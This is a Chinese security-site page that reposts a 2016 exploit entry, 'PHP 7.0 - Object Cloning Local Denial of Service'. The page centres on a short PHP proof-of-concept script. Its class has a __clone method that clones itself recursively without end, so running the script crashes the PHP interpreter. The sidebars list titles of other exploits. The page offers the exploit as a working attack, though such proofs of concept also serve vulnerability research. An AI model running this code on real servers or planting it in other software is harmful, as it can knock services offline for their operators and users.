首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PHP 7.0 - Object Cloning Local Denial of Service
来源:http://www.black-rose.ml 作者:Wizman 发布时间:2016-08-30  
<?php
#############################################################################
## PHP 7.0 Object Cloning Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
class MyCloneableClass
{
    public $obj;
    function __clone()
    {
        $this->obj = clone $this;
        return $this->obj;
    }
}
$obj    = new MyCloneableClass();
$obj2   = clone $obj;
?>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HelpDeskZ 1.0.2 - Unauthentica
·PHP 5.0.0 - domxml_open_file()
·Goron Webserver 2.0 - Multiple
·PHP 5.0.0 - simplexml_load_fil
·NScan 0.9.1 - (Target) Buffer
·PHP 5.0.0 - xmldocfile() Local
·INTELLINET IP Camera INT-L100M
·PHP 5.0.0 - imap_mail() Local
·Prestashop VtermSlideShow Modu
·PHP 5.0.0 - hw_docbyanchor() L
·Prestashop Attributewizardpro
·PHP 5.0.0 - html_doc_file() Lo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved